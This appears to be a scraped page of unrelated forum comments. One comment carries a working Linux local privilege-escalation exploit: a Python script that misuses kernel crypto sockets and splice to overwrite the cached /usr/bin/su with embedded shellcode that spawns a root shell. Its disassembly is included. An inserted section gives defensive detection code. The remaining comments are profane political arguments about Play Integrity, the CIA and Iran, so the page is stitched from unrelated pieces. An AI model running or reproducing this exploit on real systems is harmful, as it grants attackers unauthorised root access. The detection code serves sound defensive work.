

I use DragonFly BSD btw




Script:
    #!/usr/bin/env python3
    import os, socket
    f = os.open("/usr/bin/su", 0)
    e = b'\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00>\x00\x01\x00\x00\x00x\x00@\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x008\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x9e\x00\x00\x00\x00\x00\x00\x00\x9e\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x001\xc01\xff\xb0i\x0f\x05H\x8d=\x0f\x00\x00\x001\xf6j;X\x99\x0f\x051\xffj<X\x0f\x05/bin/sh\x00\x00\x00'
    # one pass per 4 bytes of the stub ELF (the "blob" disassembled below)
    for i in range(0, len(e), 4):
        s = socket.socket(38, 5, 0)
        s.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
        s.setsockopt(279, 1, bytes.fromhex('0800010000000010' + '0' * 64))
        s.setsockopt(279, 5, None, 4)
        u, _ = s.accept()
        u.sendmsg([b"AAAA" + e[i:i + 4]],
                  [(279, 3, b'\x00\x00\x00\x00'),
                   (279, 2, b'\x10' + b'\x00' * 19),
                   (279, 4, b'\x08\x00\x00\x00'), ],
                  32768)
        r, w = os.pipe()
        os.splice(f, w, i + 4, offset_src=0)
        os.splice(r, u.fileno(), i + 4)
        try:
            u.recv(8 + i)
        except: pass
    # the page cache of /usr/bin/su now holds the stub instead of the real su
    os.system("su")
Blob:
0x00400078 eax = 0
0x0040007a edi = 0
0x0040007c al = 0x69 ; 'i' ; 105
0x0040007e syscall ; sys_setuid(0)
0x00400080 rdi = rip + 0xf ; data.00400096 ; 0x400096 ; "/bin/sh"
0x00400087 esi = 0
0x00400089 push 0x3b ; ';' ; 59
0x0040008b pop rax
0x0040008c cdq
0x0040008d syscall ; sys_execve("/bin/sh", NULL, NULL)
0x0040008f edi = 0
0x00400091 push 0x3c ; '<' ; 60
0x00400093 pop rax
0x00400094 syscall ; sys_exit(0)
The blob is obviously a stub su that the /usr/bin/su page cache is poisoned with.
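A defender-side check for what the post above describes, added here as an example and not part of the original post or its author's script: the poisoned pages live only in the page cache, so the file on disk is still the real su. Two things follow. First, reading the binary normally (served from the cache) and reading it again after the cached pages are dropped with POSIX_FADV_DONTNEED should give the same hash; a mismatch means the cached copy was altered without being written back. Second, the cached bytes of a large binary should not start with a tiny static ELF (one PT_LOAD, no section headers, no PT_INTERP) that describes only a few hundred bytes of a 60 KB file. The function and constant names, the ELF64 header construction used as fixtures, and the "segments cover less than a quarter of the file" threshold are all assumptions of this example.

```python
import hashlib
import os
import struct
import tempfile

ELF64_EHDR = "<16sHHIQQQIHHHHHH"   # 64-byte ELF64 file header
ELF64_PHDR = "<IIQQQQQQ"           # 56-byte ELF64 program header
PT_LOAD, PT_INTERP, ET_EXEC = 1, 3, 2


def _read_whole(fd):
    """Read the full file behind fd from offset 0 (served from the page cache)."""
    os.lseek(fd, 0, os.SEEK_SET)
    chunks = []
    while True:
        chunk = os.read(fd, 1 << 20)
        if not chunk:
            break
        chunks.append(chunk)
    return b"".join(chunks)


def page_cache_consistent(path):
    """True when the cached contents of `path` match what a fresh read from disk
    returns. Clean pages that are not mapped by a running process are evicted by
    POSIX_FADV_DONTNEED, so the second read has to come from the block device."""
    fd = os.open(path, os.O_RDONLY)
    try:
        cached = hashlib.sha256(_read_whole(fd)).hexdigest()
        if hasattr(os, "posix_fadvise"):      # Linux/POSIX only; no-op elsewhere
            os.posix_fadvise(fd, 0, 0, os.POSIX_FADV_DONTNEED)
        on_disk = hashlib.sha256(_read_whole(fd)).hexdigest()
    finally:
        os.close(fd)
    return cached == on_disk


def elf_stub_indicators(data, file_size):
    """Return reasons why the ELF header at the start of `data` looks like a tiny
    stub sitting in a much larger file (what a first-page overwrite of a real
    binary looks like). An empty list means nothing odd was found."""
    if len(data) < 64 or data[:4] != b"\x7fELF" or data[4] != 2:
        return ["not an ELF64 header"]
    (_, e_type, _, _, _, e_phoff, e_shoff, _, _, e_phentsize,
     e_phnum, _, e_shnum, _) = struct.unpack(ELF64_EHDR, data[:64])
    reasons = []
    if e_shnum == 0 and e_shoff == 0:
        reasons.append("no section headers")
    has_interp, covered = False, 0
    for n in range(e_phnum):
        off = e_phoff + n * e_phentsize
        if off + 56 > len(data):
            break
        p_type, _, p_offset, _, _, p_filesz, _, _ = struct.unpack(
            ELF64_PHDR, data[off:off + 56])
        has_interp |= p_type == PT_INTERP
        if p_type == PT_LOAD:
            covered = max(covered, p_offset + p_filesz)
    if e_type == ET_EXEC and not has_interp:
        reasons.append("static ET_EXEC with no PT_INTERP (distro su is a PIE)")
    if covered and covered * 4 < file_size:   # assumed threshold: under a quarter
        reasons.append(f"PT_LOAD segments cover {covered} of {file_size} bytes")
    return reasons


def build_elf64_header(e_type, phdrs, e_shoff, e_shnum):
    """Constructed fixture: an ELF64 header followed by the given program headers
    (p_type, p_flags, p_offset, p_filesz). Only header structure, no code."""
    ident = b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    hdr = struct.pack(ELF64_EHDR, ident, e_type, 0x3e, 1, 0x400078, 64, e_shoff,
                      0, 64, 56, len(phdrs), 64, e_shnum, 0)
    for p_type, p_flags, p_offset, p_filesz in phdrs:
        hdr += struct.pack(ELF64_PHDR, p_type, p_flags, p_offset,
                           0x400000 + p_offset, 0x400000 + p_offset,
                           p_filesz, p_filesz, 0x1000)
    return hdr


# Constructed samples: a stub-shaped header and a normal PIE-shaped header.
STUB_HEADER = build_elf64_header(ET_EXEC, [(PT_LOAD, 5, 0, 0x9e)], 0, 0)
NORMAL_HEADER = build_elf64_header(3, [(PT_INTERP, 4, 0x318, 0x1c),
                                       (PT_LOAD, 5, 0, 59000)], 58000, 30)


def self_check():
    """Run the consistency check on a freshly written temp file (must be True)."""
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        tmp.write(os.urandom(8192))
        path = tmp.name
    try:
        return page_cache_consistent(path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for target in ("/usr/bin/su", "/bin/su"):
        if os.path.exists(target):
            with open(target, "rb") as fh:
                head = fh.read(4096)
            print(target, "cache consistent:", page_cache_consistent(target))
            print(target, "indicators:", elf_stub_indicators(head, os.path.getsize(target)))
```

The fadvise route only evicts pages that are clean and not mapped, so run it when the binary is not executing; an O_DIRECT read is the stricter alternative where the filesystem supports it. Package-manager verification (`rpm -V`, `dpkg --verify`) reads through the page cache as well, so it would also report the poisoned binary as modified, which is the quickest fleet-wide check.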


That’s what being in a fucking pickle means.
I mean, I’d do the same…


Namely,
Having a European version of the Play Integrity which permits people to use insecure products from specific European companies participating in it while disallowing using arbitrary hardware or software is the opposite of a solution. It’s more of the same anti-competitive garbage.
Hate to say it but he’s probably right.


So… the consequences of the CIA’s actions?
That’s really fucking lazy. Also the consequences of British adventures in the century right up to that point, of Mongols torching everything to the ground, and oh Xerxes should have punished Dardanelles harder.
Like, yes it’s bad to rape people’s dignity, but come on, at least glance at Wikipedia sideways.
Khamenei was very involved in that.
You’ll shit bricks when you realise Khomeini and Khamenei are not the same Ayatollah :D


You confused the Islamic Republic with the Mohammad Reza Pahlavi era.
CIA installed the son of the previous usurper. Theocracy was not installed - it was a revolution against that.
Classic rookie mistake.
Sir Arthur “Bomber” Harris